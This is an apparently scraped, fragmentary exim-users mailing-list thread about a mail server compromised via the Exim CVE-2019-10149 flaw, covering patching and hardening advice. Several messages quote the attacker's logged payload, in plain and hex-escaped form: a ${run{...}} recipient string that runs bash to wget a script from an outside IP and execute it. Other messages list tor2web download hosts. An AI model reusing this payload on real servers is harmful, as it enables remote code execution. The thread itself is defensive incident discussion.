Thanks Marius,
Yes indeed, no argument at all. I've been involved in UNIX security for
30 years (and so should have known better anyway).
Luckily, in this case, the script-kiddies efforts seem naive, and they
weren't even able to succeed in opening up SSH access, despite having
root and atte
thanks Heiko, yes, good point re unstable.
In this case, the fix /was/ available in unstable, but a few other
issues with updating had led to a delay, on that system, which proved
unfortunate.
thanks,
calum.
On 19/06/2019 12:47 pm, Heiko Schlittermann via Exim-users wrote:
Calum Mackay via
Interesting point, thanks Jan.
No external users/customers on this system, fortunately. If there were,
or it had anything sensitive anywhere near it, I'd not have been running
unstable on it, and it would have been updated much more frequently.
thanks,
calum.
On 19/06/2019 3:18 pm, Jan Ingv
Am 11.06.19 um 19:34 schrieb Calum Mackay via Exim-users:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised,
On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <
exim-users@exim.org> wrote:
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the dama
Calum Mackay via Exim-users (Di 11 Jun 2019 01:39:22
CEST):
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.
But generally speaking, I
hi all,
My mail system has just been hacked; it's running Debian unstable exim
4.91-9
Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
The reasons I suspect exim involvement:
• starting today, every 5 mins getting frozen messages:
The following address(es) have ye
Am 11.06.19 um 19:34 schrieb Calum Mackay:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running
I'm still catching up, but…
On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Is that still necessary/advised, now I'm running 4.92?
thanks,
calum.
--
## List details at https:/
thanks all, for the replies.
On 11/06/2019 7:27 am, Odhiambo Washington wrote:
ought I to be reporting this anywhere?
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
Yes, I meant that there are clearly now exploits active, alth
I googled 'an7kmd2wp4xo7hpr'
I came across
https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739
Looks like Zimbra (I suppose / assume any MTA), is being "probed" and
pertaining to CVE-2019-9670
Regards
Brent
On 2019/06/11 14:46, Konstantin Boyandin via Exim-users wrote:
Hi C
Am 11.06.19 um 14:46 schrieb Konstantin Boyandin via Exim-users:
> I don't know where to report such things. To malware/antivirus
> manufacturers, perhaps?
>
> But the proper question is, IMHO, "why I haven't hardened my Exim
> installations while I could".
>
The Hoster:
#whois 1.2.3.4 | grep -i
Hi Calum,
Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
attacked yesterday by similar means. The attacker, in my case, tried to
download and execute one of the below (I excluded scheme prefix from links):
an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targetting Linux systems using systemd.
Not only that, it is
On Tue, 11 Jun 2019 at 10:26, Cyborg via Exim-users
wrote:
> Am 11.06.19 um 02:10 schrieb Calum Mackay via Exim-users:
> >
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2f
Hi,
Am Di den 11. Jun 2019 um 7:53 schrieb Cyborg via Exim-users:
> :
> Restricted characters in address
Oh, you censored the address you are sending from? :-D
> This attack was presented to you by... the Seychelles Islands.
Ah, and I woundered why I did not see any try in my logs.
But I have
Am 11.06.19 um 02:10 schrieb Calum Mackay via Exim-users:
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\
Am 11.06.19 um 08:27 schrieb Odhiambo Washington via Exim-users:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
> exim-users@exim.org> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't
You got it.
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Am 11. Juni 2019 02:10:40 MESZ schrieb Calum Mackay via Exim-users
:
>hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
exim-users@exim.org> wrote:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim invol
hi all,
My mail system has just been hacked; it's running Debian unstable exim
4.91-9
Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
The reasons I suspect exim involvement:
• starting today, every 5 mins getting frozen messages:
The following address(es) have ye
21 matches
Mail list logo
